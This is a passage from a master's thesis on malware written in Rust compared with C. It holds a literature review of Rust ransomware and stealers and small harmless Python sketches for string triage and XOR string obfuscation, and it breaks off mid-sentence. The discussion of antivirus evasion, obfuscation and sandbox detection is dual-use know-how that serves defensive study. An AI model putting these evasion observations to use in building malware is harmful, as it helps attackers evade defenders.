
Rochester Institute of Technology

RIT Digital Institutional Repository

Theses

5-2023

A Comparative Analysis of Malware Written in the C and Rust
Programming Languages
Meghna Koorikkattil Praveen
mk7898@rit.edu

Follow this and additional works at: https://repository.rit.edu/theses

Recommended Citation
Praveen, Meghna Koorikkattil, "A Comparative Analysis of Malware Written in the C and Rust
Programming Languages" (2023). Thesis. Rochester Institute of Technology. Accessed from

This Thesis is brought to you for free and open access by the RIT Libraries. For more information, please contact
repository@rit.edu.
A Comparative Analysis of Malware Written in the C and
Rust Programming Languages

by

Meghna Koorikkattil Praveen

A thesis submitted in partial fulfillment of the requirements for
the degree of Master of Science in Computing Security

Supervised by

Dr. Wesam Almobaideen

Department of Electrical Engineering and Computing


Rochester Institute of Technology Dubai
United Arab Emirates

May, 2023
Rochester Institute of Technology Dubai
Department of Electrical Engineering and Computing
Master of Science in Computing Security

Thesis Approval Form

Student Name: Meghna Koorikkattil Praveen.


Thesis Title: A Comparative Analysis of Malware Written in the C and Rust Programming
Languages.

Committee Approval:

Committee Chair Dr. Wesam Almobaideen Date


Professor
Department of Electrical Engineering and Computing

Committee Member Dr. Kevser Ovaz Akpinar Date


Assistant Professor
Department of Electrical Engineering and Computing

Committee Member Dr. Omar Abdul Latif Date


Assistant Professor
Department of Electrical Engineering and Computing
Declaration
In accordance with the Rust Foundation’s draft of their new trademark policy (Apr. 2023), I
declare that the material in this thesis has not been endorsed, reviewed or approved by the
Rust Foundation. Additionally, I affirm that I have adhered to the trademark policy of all
registered trademarks mentioned in this thesis to the best of my ability. Any unauthorized use
of a trademark is unintentional and will be corrected.

Furthermore, I declare that this thesis is my own original work, with the exception of
references and acknowledgments that are clearly indicated. I have taken care to fully
acknowledge and cite all sources of information and ideas used in the development of this
work. This thesis has not been submitted for any other degree or examination at this or any
other institution.

Acknowledgments
I would like to dedicate this thesis to my late grandfather, who is the embodiment of hard
work and dedication. His unwavering commitment to educating his children and
grandchildren, despite his own lack of formal education, taught me the importance of
perseverance and the value of education. I would like to express my heartfelt gratitude to my
parents, for their constant encouragement and tireless efforts to provide me with the best
opportunities. I am eternally grateful for their sacrifices and commitment to my success.

I would like to thank my thesis advisor, Dr. Wesam Almobaideen, for his exceptional
guidance and support throughout the entire process. His insightful feedback and constructive
criticism challenged me to refine my research and improve the quality of this thesis. I would
also like to extend my sincere appreciation to Dr. Kevser Ovaz Akpinar and Dr. Omar Abdul
Latif, my thesis committee members for their time, effort, and expertise in reviewing my
work. Completing this thesis has been an incredible learning experience, and I am honored to
have had the opportunity to work and learn from such a knowledgeable group of
professionals.

Abstract
The use of malware as a tool for cybercrime has become increasingly prevalent in recent
years, resulting in significant economic losses and security threats. Conventionally, malware
is written in C/C++. However, a recent trend has been observed where other languages are
being used to write malware. One such language is the Rust programming language. This
thesis aims to explore the aspects of the Rust programming language that contribute to its
preference for the development of malware, limitations in current analysis tools and
remediation for the same. A Systematic Literature Review (SLR) was conducted to identify
the trends of current research on malware written in the Rust programming language. For
experimentation, 40 malware samples belonging to 6 different categories of malware were
developed in the C and the Rust programming languages. These samples were compared for
their ease of analysis and effectiveness of antivirus evasion. It was observed that academic
and individual research in this area is sparse compared to industrial research. Results of the
experimentation show that current tools are comparatively less effective at analyzing and
reverse engineering malware written in the Rust programming language than those written in
C. Moreover, malware written in the Rust programming language evades antivirus detection
much better than its C counterparts. Based on the findings, a practical framework to
analyze malware written in the Rust programming language is proposed. The findings of this
thesis highlight the need for enhanced detection strategies for malware written in
unconventional programming languages. Overall, it contributes to the broader literature on
cybersecurity by offering new perspectives and recommendations for addressing this critical
challenge.

Keywords – anti-analysis, antivirus evasion, malware analysis, malware, reverse engineering,
Rust programming language, systematic literature review.

Table of Contents
Declaration

Acknowledgments

Abstract

1 Introduction

2 Background
2.1 Malware
2.2 Malware Analysis
2.2.1 Static Analysis
2.2.2 Dynamic Analysis
2.2.3 Code Analysis
2.3 The Rustc Compiler
2.4 The GCC and MSVC Compilers

3 Systematic Literature Review
3.1 SLR Inclusion and Exclusion Criteria
3.2 Industrial and Independent Research
3.2.1 BuerLoader Variant
3.2.2 Hive Ransomware Variant
3.2.3 BlackCat Ransomware
3.2.4 Luna Ransomware
3.2.5 Luca Stealer
3.2.6 Nokoyawa Variant
3.2.7 RansomExx Variant
3.2.8 Agenda Ransomware Variant
3.2.9 RustBucket
3.2.10 Related Works in Go and Nim
3.3 Academic Research
3.4 SLR Observations
3.4.1 Gaps in Current Research
3.4.3 Challenges in Current Research

4 Methodology
4.1 Experimental Design
4.1.1 Programs Developed for Static and Dynamic Analysis
4.1.2 Program Developed for Code Analysis
4.2 Experiment 1: Comparing the Ease of Malware Analysis and Reverse Engineering
4.3 Experiment 2: Comparing the Effectiveness of Antivirus Evasion

5 Results
5.1 Results of Experiment 1
5.1.1 Size of the Binaries
5.1.2 Identifiable String Patterns in the Binaries
5.1.3 False Positive and False Negative MITRE ATT&CK findings
5.1.4 Reverse Engineering using Ghidra
5.1.5 Reverse Engineering using IDAFree
5.1.6 Summary of Results of Experiment 1
5.2 Results of Experiment 2
5.2.1 Summary of Results of Experiment 2

6 Discussion
6.1 Larger Binary Size of the Malware Written in the Rust Programming Language
6.1.1 Standard and Runtime Libraries
6.1.2 Default Dependency Linkage
6.1.3 Inlining and Loop Unrolling for Optimization
6.2 More Identifiable Strings in the Malware Written in the Rust Programming Language
6.3 Limitations of Existing Reverse Engineering Tools
6.3.1 Name Mangling
6.3.2 Additional Code Added for Exception Handling
6.4 Limitations of Existing Detection Systems

7 Recommended Analysis Framework
7.1 Phase 1: Static Analysis
7.2 Phase 2: Signature-based detection
7.3 Phase 3: Hybrid Dynamic Analysis Approach
7.4 Phase 4: Code Analysis
7.4.1 Technique to Find the Main Function
7.4.2 GhidRust
7.4.3 GhidraRustDependenciesExtractor
7.4.4 DemangleRust.py
7.5 Limitations and Future Work

8 Conclusion

References

Appendix A

Appendix B

List of Figures
Figure 1. Timeline of attacks by malware written in the Rust programming language
Figure 2. Categories of malware developed and tested
Figure 3. Control flow of the code analyzed program
Figure 4. Exposed home directory in the embedded strings of the malware written in the Rust programming language
Figure 5. Symbol tree of the program written in the C programming language in Ghidra
Figure 6. Decompiled "main" function of the program written in the C programming language in Ghidra
Figure 7. Decompiled "is_valid" function of the program written in the C programming language in Ghidra
Figure 8. Searching for the "Access Denied" text in the program written in the Rust programming language in Ghidra
Figure 9. Decompiled "main" function of the program written in the Rust programming language in Ghidra
Figure 10. Additional code observed in the program written in the Rust programming language in Ghidra
Figure 11. Combined code found in the decompiled program written in the Rust programming language in Ghidra
Figure 12. Disassembled flow of the "main" function of the program written in the C programming language in IDA Free
Figure 13. Disassembled flow of the "is_valid" function of the program written in the C programming language in IDA Free
Figure 14. Disassembled flow of the program written in the Rust programming language in IDA Free
Figure 15. The recommended malware analysis framework

List of Tables
Table 1. Overview of industrial and independent research
Table 2. Overview of academic research
Table 3. List of software used for the experiments
Table 4. Mapping of the MITRE ATT&CK Techniques Mapped to the Sub-categories of malware
Table 5. The cause-effect design of Experiment 1
Table 6. The cause-effect design of Experiment 2
Table 7. Comparison of the size of malware binaries
Table 8. List of identifiable strings in the binary
Table 9. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the C programming language
Table 10. Calculation of FP% and FN% MITRE ATT&CK findings for malware in the Rust programming language
Table 11. Results of comparison of the FP% and FN% of malware written in the C and Rust programming languages
Table 12. Calculation of the evasion% of malware written in the C programming language
Table 13. Calculation of the evasion% of malware written in the Rust programming language
Table 14. Results of comparison of the evasion% of malware written in the C and Rust programming languages

1 Introduction
Malware, short for “malicious software,” is a computer program written to perform harmful
actions such as destroying, disabling, or stealing computer assets [1]. Polyglot malware is
malware that exists in different file formats or has variants in multiple programming languages [2].
According to Statista, 5.4 billion malware attacks were detected in 2021 [3]. An emerging
trend observed in 2021 is a shift toward unconventional programming languages (also known
as exotic languages) such as Rust, Go, and Nim for writing malware [4]. Industrial reports
state that this shift is motivated by a desire to make reverse engineering of malware difficult and
to evade signature-based detection mechanisms [5], [6]. However, there is a lack of research
with empirical evidence supporting this statement. This thesis investigates the motivation for
the shift from conventional C/C++ to these unconventional programming languages,
specifically the Rust programming language.

The Rust programming language is a new, open-source programming language whose first
stable version was released on May 15, 2015 [7]. It started as a project within Mozilla
Research to develop a multi-paradigm programming language that provided excellent
memory safety, speed, and concurrency [8], [9]. Moreover, it uses the Low Level Virtual
Machine (LLVM) compiler technology for improved performance [10]. Due to these features,
it quickly rose to popularity, and software developers began to rewrite existing C/C++
software in the Rust programming language [11]. For example, Mozilla rewrote approximately
160,000 lines of C++ code in the Firefox browser in the Rust programming language [8]. Another
notable adoption of the Rust programming language is within the Linux kernel and Linux
drivers [12], [13], [14].

The Rust programming language has also gained immense popularity among many malware
developers since 2021 [15], [16]. Notorious Ransomware as a Service (RaaS) groups have
begun to distribute polyglot malware by migrating their works to Rust. A timeline of attacks
carried out by malware written in the Rust programming language is illustrated in Figure 1.

Figure 1. Timeline of attacks by malware written in the Rust programming language.

To improve current defense mechanisms and strategies, it is imperative to
understand the characteristics of the Rust programming language that could be advantageous
to an attacker. However, a Systematic Literature Review (SLR) found that,
despite its popularity, the Rust programming language is the least researched in academia,
particularly within the area of malware development. Hence, this thesis is motivated by the
lack of research on malware written in the Rust programming language despite its rise in
popularity as a programming language of choice among malware authors.

The objective of this thesis is to answer the following research questions:

RQ1: What features of the Rust programming language have led to its growing prevalence
among malware authors?
RQ2: What are the constraints of the currently available malware analysis and detection
tools in terms of examining malware written in the Rust programming language?
RQ3: What techniques can be used to better analyze malware written in the Rust
programming language?

This thesis compares malware written in the C and Rust programming languages for ease of
analysis from a defender's perspective and ease of antivirus evasion from an attacker's
perspective. The differences in analyzing and reverse engineering malware written in the two
languages are identified. Furthermore, this thesis conducts a comparative study of the antivirus
evasion rates of malware written in the C and Rust programming languages by running the
samples through 70 different antivirus providers. The following hypotheses are tested:

H1: The intricacies of the rustc compiler complicate the analysis of malware written in
the Rust programming language compared to that written in C.
H2: Malware written in the Rust programming language evades antivirus detection better
than that written in C.

In addition to the results of the comparative analysis, the contribution of this thesis is a
practical malware analysis framework proposed specifically to analyze malware written in
the Rust programming language. This framework can be used by malware analysts to analyze
new malware or a malware variant written in the Rust programming language.

The rest of this thesis is structured as follows: Chapter 2 provides background on malware,
malware analysis, and the rustc, GNU Compiler Collection (GCC), and Microsoft Visual C++
(MSVC) compilers for a new reader. Chapter 3 discusses the industrial, independent,
and academic research that was reviewed. Chapter 4 explains the research methodology.
Chapter 5 presents the results of the experiments conducted for this thesis. Chapter 6
discusses the implications of these results based on which a practical framework for
analyzing malware written in the Rust programming language is proposed in Chapter 7.
Finally, Chapter 8 concludes this thesis.

2 Background
This chapter provides a background on the core concepts discussed in this thesis such as the
history of malware, the types of malware, the malware analysis process and the compilers
used by the C and the Rust programming languages.

2.1 Malware
In 1966, von Neumann's “Theory of Self-Reproducing Automata” [17], [18] was published, in which
he speculated that computer code could have the ability to copy itself to other systems like a
biological virus. The history of malware dates back to the early days of computer technology,
with some of the earliest recorded instances, such as the Creeper program, appearing in 1971 [19].
Over time, malware has evolved and become more sophisticated with the development of
new techniques for spreading and evading detection [20], [21], [22], [23].

The following are the common types of malware [1], [24]:

1. Viruses: They are self-replicating malware that spread through infected files in email
attachments or removable media like USB drives.

2. Worms: They are also self-replicating malware. However, they do not require a file to
spread and can spread across networks. Some worms are designed to create backdoors
in a system to allow attackers to gain unauthorized access.

3. Trojans: They are malware that are disguised as legitimate software. Similar to
worms, trojans often open a backdoor for attackers. They are also used to steal
sensitive information. However, trojans cannot self-replicate or spread like worms and
viruses.

4. Ransomware: They are malware that encrypt a victim's files and demand a ransom in
exchange for the decryption. Certain variants of ransomware also threaten to leak
sensitive information if the ransom is not paid.

5. Information Stealer: They are malware that are designed to monitor and steal a
user's information such as their keystrokes, browsing history, usernames, and
passwords.

6. Adware: They are malware that display unwanted advertisements on a user's
computer. They act as a nuisance, slow down the system, and may lure the victim into
downloading more dangerous malware.

2.2 Malware Analysis


Malware analysis is the process of examining malicious software to identify its purpose,
understand its behavior, and develop defense mechanisms to detect and remove it [25], [26],
[27]. Malware analysis can be done in three stages: static analysis, dynamic analysis, and
code analysis [28], [29].

2.2.1 Static Analysis

Static analysis involves gathering information about the malware without executing its binary
[30]. It examines information such as the file type, file hash, and embedded strings to draw
inferences regarding the source language, intent, and potential behavior of the malware
[31], [32].

While static analysis is a good starting point, it is not sufficient on its own because
malware often exhibits malicious behavior only at runtime [33]. For this reason, static analysis
should be followed by dynamic analysis.
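The static checks described above (file hash, file type, and embedded strings) can be illustrated with a minimal Python sketch. This is not the tooling used in this thesis; the function names, the magic-byte table, and the list of Rust hint markers are assumptions chosen for illustration, and the sample bytes are fabricated rather than taken from a real binary.

```python
import hashlib
import re

# Magic bytes for two common executable formats (illustrative subset only).
MAGIC = {b"MZ": "PE (Windows)", b"\x7fELF": "ELF (Linux)"}

# Hypothetical markers that may hint at a Rust toolchain; not a real signature set.
RUST_HINTS = (b".rs", b"cargo", b"rustc")


def file_type(data: bytes) -> str:
    """Guess the file type from its leading magic bytes."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def embedded_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII that are at least min_len bytes long."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def triage(data: bytes) -> dict:
    """Collect the basic static indicators without executing the binary."""
    strings = embedded_strings(data)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "type": file_type(data),
        "string_count": len(strings),
        "rust_hints": [s for s in strings if any(h in s for h in RUST_HINTS)],
    }


if __name__ == "__main__":
    # Fabricated bytes standing in for a binary; no real sample is used.
    sample = (b"MZ\x90\x00" + b"\x00" * 8
              + b"/home/user/.cargo/registry/src/lib.rs\x00"
              + b"\x01\x02Access Denied\x00")
    report = triage(sample)
    print(report["type"], report["string_count"], report["rust_hints"])
```

In practice, an analyst would read the bytes from the file under analysis and compare the hash against known-malware databases; the hint list here only shows how embedded paths can suggest the source language.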

2.2.2 Dynamic Analysis

Dynamic analysis involves gathering information about the runtime behavior of the malware
by executing it in an isolated environment like a sandbox or a virtual machine (VM) [1], [24],
[34], [35]. This includes monitoring the network traffic generated by the malware and its
interaction with the target’s file system. This step is crucial to identify command and control
(C&C or C2) servers, lateral movement techniques, files dropped or files exfiltrated by the
malware. Dynamic analysis is particularly useful for detecting previously unknown malware
that tend to go undetected by signature-based antivirus software.

Sophisticated malware may contain code that detects whether it is running in a
sandbox or a VM [33], [36]. Such malware remains dormant in these isolated environments,
making dynamic analysis less effective. For this reason, code analysis is required.

2.2.3 Code Analysis

Code analysis is often referred to as code reversing or reverse engineering [37], [38]. Code
analysis involves examining the disassembled or decompiled code of the malware to identify
hidden functionalities, attack flow, and other malicious behavior.

Disassembly is the process of converting the binary code of the malware into assembly code.
This can be done using tools such as IDA [39], [40] or OllyDbg [41]. Decompilation is the
process of converting the binary or assembly code into a higher-level language such as C,
C++ or Rust. This can be done using tools like Ghidra [42].

2.3 The Rustc Compiler


Rustc is the compiler for the Rust programming language [43]. It translates code written in
the Rust programming language into machine code that can be executed on a specific target
platform. At its core, rustc uses the Low Level Virtual Machine (LLVM) compiler technology
[44], [45]. LLVM provides a powerful set of tools for code optimization, which allows rustc
to produce code that is both fast and reliable. Additionally, rustc has built-in optimizations to
further improve code performance.

A key highlight of rustc when developing large projects is incremental compilation, which
significantly reduces the compile time of a Rust project by reusing previously compiled parts
of the project [46]. This is done by keeping a record of the dependencies used in each part of
the code and selectively recompiling only the parts that have changed. Another useful aspect
of rustc is its support for cross-compilation, which allows developers to compile code for a
target platform different from the one they are currently using [47]. Rustc makes
cross-compilation easy by providing a number of pre-built cross-compilation toolchains as
well as support for custom toolchains.
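The idea behind incremental compilation, recording dependencies and recompiling only what has changed, can be illustrated with a toy Python model. This is a simplified sketch and not rustc's actual mechanism; the class name, the unit names, and the fingerprinting scheme are assumptions made for illustration, and the dependency graph is assumed to be acyclic.

```python
import hashlib


class IncrementalBuilder:
    """Toy model: rebuild a unit only if it or one of its dependencies changed."""

    def __init__(self, deps):
        self.deps = deps          # unit name -> list of units it depends on
        self.fingerprints = {}    # unit name -> fingerprint at the last build

    def _fingerprint(self, unit, sources):
        # Hash the unit's own source together with its dependencies' fingerprints,
        # so a change in a dependency also changes the dependent's fingerprint.
        h = hashlib.sha256(sources[unit].encode())
        for dep in sorted(self.deps.get(unit, [])):
            h.update(self._fingerprint(dep, sources).encode())
        return h.hexdigest()

    def build(self, sources):
        """Return the sorted list of units that had to be recompiled."""
        rebuilt = []
        for unit in sources:
            fp = self._fingerprint(unit, sources)
            if self.fingerprints.get(unit) != fp:
                self.fingerprints[unit] = fp  # record the new state
                rebuilt.append(unit)
        return sorted(rebuilt)


if __name__ == "__main__":
    deps = {"main": ["util"], "util": [], "net": []}
    sources = {"main": "fn main() {}", "util": "fn helper() {}", "net": "fn connect() {}"}
    builder = IncrementalBuilder(deps)
    print(builder.build(sources))   # first build: ['main', 'net', 'util']
    print(builder.build(sources))   # nothing changed: []
    sources["util"] = "fn helper() { /* edited */ }"
    print(builder.build(sources))   # ['main', 'util']
```

Editing `util` triggers a rebuild of `util` and of `main`, which depends on it, while the unrelated `net` unit is reused as-is.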

2.4 The GCC and MSVC Compilers
GCC MinGW [48] is a port of the GNU Compiler Collection (GCC) [49], [50] that provides a
Unix-like environment on Windows for developers to build native Windows applications
using the C, C++, and Fortran programming languages. The GCC MinGW project is open-source
and is actively maintained by a community of developers, making it a reliable and flexible
tool for Windows software development.

The Microsoft Visual C++ (MSVC) [51] compiler is a commercial compiler that is part of the
Microsoft Visual Studio Integrated Development Environment (IDE) [52], which supports C
and C++. It is used for developing applications for the Windows operating system and is
optimized for performance and compatibility with Microsoft's libraries and tools.

One of the main differences between GCC and MSVC is their target platforms. GCC is a
cross-platform compiler that can be used to build applications for a wide range of platforms,
including Linux, macOS, and Windows [50]. MSVC, on the other hand, is a compiler that is
specifically designed for building applications for the Windows operating system [51]. As a
result, MSVC provides deeper integration with the Windows operating system and
Microsoft's libraries and tools.

3 Systematic Literature Review
A Systematic Literature Review (SLR) is a rigorous literature review methodology that
involves the collection and study of defined categories of literature to gather evidence in a
manner that can be easily reproduced by future researchers [53].

In this thesis, an SLR was performed to understand the current state of research on malware
written in the Rust programming language. Due to the nature of this topic, the search for
literature was not limited to academic sources; independent and industrial research were also
included. The observations drawn from the SLR are detailed in Section 3.4.

3.1 SLR Inclusion and Exclusion Criteria


The inclusion and exclusion criteria for selecting literature for the SLR are as follows:

Inclusion Criteria:

1. Independent research presented at reputed cybersecurity conferences like BlackHat,
DEFCON and BSides.

2. Industrial research published as white papers by reputed companies like Kaspersky,
Microsoft, BlackBerry, McAfee, IBM, etc.

3. Academic research published in journals or conferences.

4. Books and Theses.

Exclusion Criteria:

1. Independent blogs and videos.

2. Sources that are not in English.

3.2 Industrial and Independent Research
The works of industrial pioneers such as Kaspersky, Microsoft and BlackBerry in analyzing
malware written in the Rust programming language are discussed in detail in Sections
3.2.1-3.2.9. Section 3.2.10 discusses similar works conducted by individual researchers on
malware written in other programming languages such as Go and Nim.

3.2.1 BuerLoader Variant

Proofpoint Threat Research Team [15] identified a variant of BuerLoader written in the
Rust programming language in May 2021 and named it RustyBuer. BuerLoader is a type
of malware that is used to deliver other malware payloads onto a victim's computer.
Proofpoint’s analysis of RustyBuer shows that the source language of the binary was detected
from the cargo and “.rs” dependencies [15]. However, the techniques used to analyze the
malware or list these dependencies were not documented. The report concludes by stating
that the use of the Rust programming language in malware development is likely to increase.

3.2.2 Hive Ransomware Variant

Microsoft [16] has provided a detailed report of the upgraded Hive ransomware which was
rewritten from Go to the Rust programming language. Hive was first observed in June 2021
and grew in popularity within the Ransomware as a Service (RaaS) ecosystem. The report
states that the upgraded variant in the Rust programming language provides better
performance and improved anti-analysis techniques. It also performs an Exclusive OR (XOR)
operation on the strings with constants to evade detection. This report does not explicitly
mention the tools used to analyze the binary. However, from the images in it [16], one can
infer that OllyDbg [41] or Immunity Debugger [54] were used to analyze the binary.
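
The XOR-based string obfuscation described in the report relies on XOR being its own inverse: applying the same constant a second time restores the original bytes, which is also how an analyst can recover such strings once the constant is known. The following Python sketch illustrates the principle only. It assumes a single-byte constant; the key value 0x5A, the function name xor_bytes and the example string are hypothetical and do not reproduce the scheme used by Hive.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a one-byte constant key."""
    return bytes(b ^ key for b in data)


KEY = 0x5A                      # hypothetical constant, for illustration only
plain = b"example string"       # hypothetical string stored in a binary

hidden = xor_bytes(plain, KEY)      # what a strings scan would see
restored = xor_bytes(hidden, KEY)   # applying the same key again undoes it

print(hidden)
print(restored)
```

Because the obfuscated bytes no longer match the readable string, a plain strings scan of the binary would not reveal it, which is why this technique hinders static analysis.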

3.2.3 BlackCat Ransomware

BlackCat was first observed in December 2021 when it was advertised by a RaaS group
called ALPHV. It is the most widely discussed and analyzed malware written in the Rust
programming language, most notably by researchers at Palo Alto Unit 42 [55], Microsoft [56]
and Kaspersky [57], [58]. Owing to the cross-compilation capability of the Rust programming
language, BlackCat samples targeting both the Windows and Linux operating systems have
been identified. BlackCat has anti-analysis features that detect whether it is being deployed
in a virtual environment before executing its payload. It also has the ability to terminate
security software like antivirus and backup tools.

Similar to Proofpoint’s analysis of RustyBuer [15], Kaspersky’s malware analysis report
also demonstrates the detection of the source language by identifying the cargo and “.rs”
dependencies. Snippets of the disassembled and decompiled binary are shown in the report;
however, the tools and techniques used to reverse engineer this malware are not discussed.

3.2.4 Luna Ransomware

In June 2022, researchers at Kaspersky [59] discovered the Luna ransomware, which is
written in the Rust programming language. This malware targets Windows, Linux and ESXi
systems. Rivero et al. identified that it uses an uncommon combination of X25519 and AES
(Advanced Encryption Standard) for encryption [60]. Their analysis report states that
ransomware gangs are moving towards the Go and Rust programming languages because
source code in these languages is easy to port owing to their platform-agnostic nature,
unlike C/C++, which uses different APIs and compilers for different platforms.

3.2.5 Luca Stealer

BlackBerry [61] analyzed Luca Stealer, a malware written in the Rust programming language,
which was used to steal 7 million dollars' worth of SOL coins from the Solana blockchain on
August 3, 2022. Several variants have appeared since its source code was made available on
an underground hacking forum. BlackBerry’s research team discovered that the variants of
Luca Stealer collect sensitive data such as system information, browser data, and Discord
tokens in “.txt” or “.zip” files and exfiltrate them as a chat message on Telegram or Discord.
Although it was observed that the malware only targets the Windows operating system, they
predict that variants targeting Linux, macOS and Android exist due to the cross-compilation
ability of the Rust programming language.

3.2.6 Nokoyawa Variant

In September 2022, a variant of the Nokoyawa ransomware that was rewritten from C to
the Rust programming language was identified [62]. Researchers at Zscaler [63] published
their technical analysis of this variant. It was found that this variant uses the x25519_dalek
Rust library for encryption. They suggest that the rewrite was motivated by the faster
encryption provided by the cryptographic libraries of the Rust programming language.

3.2.7 RansomExx Variant

In November 2022, IBM Security X-Force [64] reported a variant of the RansomExx
ransomware that was rewritten from C++ to the Rust programming language. When run through
VirusTotal at the time, it was detected by only 14 antivirus vendors. The researchers at IBM
Security X-Force detected the source language of the binary from the strings within the
binary. They state that the binary is comparatively difficult and very time-consuming to
analyze and reverse engineer. They conclude by saying that it is highly likely that more
ransomware operators will adopt the Rust programming language as an innovative technique
to build stable and evasive malware.

3.2.8 Agenda Ransomware Variant

In December 2022, Trend Micro [65] published their analysis of a variant of the Agenda (also
known as Qilin) ransomware rewritten from Go to the Rust programming language. The
Agenda ransomware is notorious for targeting healthcare and education organizations in
Thailand and Indonesia. From the analysis, the researchers at Trend Micro discovered that the
new variant written in the Rust programming language had features for faster encryption and
better antivirus evasion. Unlike the previously mentioned reports, Trend Micro’s report
mentions the tools used during the analysis. BinText [66] was used to view the dependency
strings to identify the source language, and Hiew [67] was used to view the changes made to a
file when analyzing the fast encryption feature of the new variant.

3.2.9 RustBucket

In this survey, RustBucket was the only malware written in the Rust programming language
that was found to target the macOS operating system. RustBucket was detected by
Jamf Threat Labs in April 2023 [68]. It has a complex multi-stage execution process.
According to Jamf, it was undetected by all the antivirus vendors in VirusTotal at the time of
analysis.

3.2.10 Related Works in Go and Nim

Some individual researchers have also presented their research at conferences like DEFCON
and BSides. Individual researchers worth mentioning are Kiely [69], [70] for his work on
analyzing malware written in the Nim programming language, and Kurtz [71] and McMurray
and Seese [72] for their work on analyzing malware written in the Go programming language.
These researchers have briefly mentioned the technicalities that make reverse
engineering of these binaries difficult and antivirus evasion easier. However, these works
concern only malware written in the Nim or Go programming languages. There is a lack of
similar research for malware written in the Rust programming language.

Table 1 summarizes the industrial and independent research discussed in this section. For
each research work, its category (industrial or independent) and the source language of the
malware are listed. It also shows whether the research explains the tools and techniques used
to analyze the malware, and whether it discusses language-specific technicalities considered
during analysis.

Table 1. Overview of industrial and independent research.


Malware’s     Researcher’s                                     Research      Original   Rewritten  Explains tools   Explains language-
name          name                                             category      language   language   & techniques     specific technicalities
BuerLoader    Proofpoint [15]                                  Industrial    C          Rust       x                x
Hive          Microsoft [16]                                   Industrial    Go         Rust       x                x
BlackCat      Kaspersky [58], Microsoft [56], Palo Alto [55]   Industrial    Rust       N/A        x                x
Luna          Kaspersky [60]                                   Industrial    Rust       N/A        x                x
LucaStealer   BlackBerry [61]                                  Industrial    Rust       N/A        x                x
Nokoyawa      Zscaler [63], Trend Micro [62]                   Industrial    C          Rust       x                x
RansomExx     IBM X-Force [64]                                 Industrial    C++        Rust       x                x
Agenda        Trend Micro [65]                                 Industrial    Go         Rust       x                x
RustBucket    Jamf [68]                                        Industrial    Rust       N/A        x                x
Custom        Matt Kiely [70], [69]                            Independent   Nim        N/A        ✔                ✔
Custom        Ben Kurtz [71]                                   Independent   Go         N/A        ✔                ✔
Custom        McMurray and Seese [72]                          Independent   Go         N/A        ✔                ✔

3.3 Academic Research
Academic sources were reviewed from four digital databases: ACM Digital Library,
IEEE Xplore, ScienceDirect and SpringerLink. Over 300 sources were reviewed. In each
database, the search term used was: (Rust OR “Rust programming language”) AND
(malware OR “reverse engineer”).

Table 2 lists the results of this search as of April 26, 2023. Additional search filters of
“Article” and “Conference Paper” were applied only for the SpringerLink database. The third
column shows the total number of works returned by each digital database. Of these results,
works relevant to analyzing or reverse engineering malware written in the Rust programming
language are noted in the last column.

Table 2. Overview of academic research.


Database Name         Additional Search    Total Number   Number of
                      Filters Applied      of Works       Relevant Works
ACM Digital Library   None                 120            0
IEEE Xplore           None                 10             0
ScienceDirect         None                 64             0
SpringerLink          Article              58             0
SpringerLink          Conference Paper     54             0

It was found that there were no relevant academic works that studied malware written in the
Rust programming language. However, there were a few works whose insights and
methodology were used or modified to design the experiments for this thesis. These works
are discussed below.

Adhikari et al. [73] developed a system to detect the source language of a binary using the
Linux strings tool. When a binary is passed to the Linux strings tool, it outputs all sequences
of printable characters in the binary. The authors used this output to identify the language of
a binary. They trained a Random Forest model on the output of the Linux strings tool applied
to C, C++, Rust, Go, Fortran, and Swift binaries. However, Adhikari et al. did not mention the
specific strings or string patterns that were used to identify the language of the compiled
binary. Akabane et al. [74] studied different toolchains used to build IoT malware by
identifying the names of different library functions listed in the decompiled code. Akabane et
al. list studying malware written in the Rust and Go programming languages as future work.
Using the insights from the works of Akabane et al. and Adhikari et al., this thesis produces a
list of strings that can be used by malware analysts to identify whether the source language of
the compiled binary was C or the Rust programming language.
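
The string-based identification idea discussed above can be sketched in a few lines of Python. This is an illustrative sketch only: it imitates the strings tool by extracting runs of at least four printable ASCII characters, and then looks for the kind of cargo and “.rs” dependency strings mentioned in the industrial reports. The pattern list RUST_HINTS, the function names and the sample bytes are hypothetical; they are not the list of strings produced by this thesis.

```python
import re

# Hypothetical indicator patterns, chosen for illustration only.
RUST_HINTS = [
    re.compile(r"\.rs\b"),        # Rust source paths such as "src/lib.rs" (not ".rsrc")
    re.compile(r"\.cargo[\\/]"),  # Cargo registry paths
    re.compile(r"\brustc\b"),     # compiler name
]


def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII characters, similar to the strings tool."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [match.decode("ascii") for match in pattern.findall(data)]


def rust_indicators(strings: list[str]) -> list[str]:
    """Keep only the strings that match at least one Rust hint."""
    return [s for s in strings if any(p.search(s) for p in RUST_HINTS)]


# Hypothetical bytes standing in for the contents of a compiled binary.
sample = b"\x00\x01/home/user/.cargo/registry/src/lib.rs\x00.rsrc\x00\x02ab\x00"

found = printable_strings(sample)
print(found)
print(rust_indicators(found))
```

The word-boundary check in the first pattern is a deliberate design choice: without it, the “.rsrc” section name found in most Windows executables would be mistaken for a Rust source file.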

As mentioned earlier, rustc uses LLVM for optimization. There were two interesting works
related to LLVM. Küchler et al. [75] developed a tool that generates a code property graph
using the intermediate code of LLVM compilers (LLVM-IR). The authors developed this tool
to allow application security analysts to analyze binary dependencies of software. Tamboli et
al. [76] studied the techniques used by metamorphic malware to evade signature-based
detection. They developed a metamorphic code generator using the LLVM framework. This
code generator manipulates the LLVM-IR through dead code injection, register swapping,
substitution, and transposition. Because rustc is built on LLVM, the possibility of such
modifications at the LLVM-IR level is advantageous to malware developers who use Rust.

Dube et al. [77] studied various malware obfuscation techniques that make reverse
engineering difficult. Although the goal of this research was to apply the same techniques as
that of malware to protect software intellectual property, this work gives useful insights into
obfuscation techniques. The authors identified that upon obfuscation, the binaries are difficult
to analyze using popular tools like IDA (Interactive Disassembler).

WebAssembly, also known as Wasm, is a low-level compilation target for high-level languages
like C/C++, Rust, or Go. The purpose of Wasm is to allow developers to write
browser-executable programs in a high-level language of their choice. Bhansali et al. [78]
discussed different techniques to obfuscate Wasm code. They found that since Wasm is
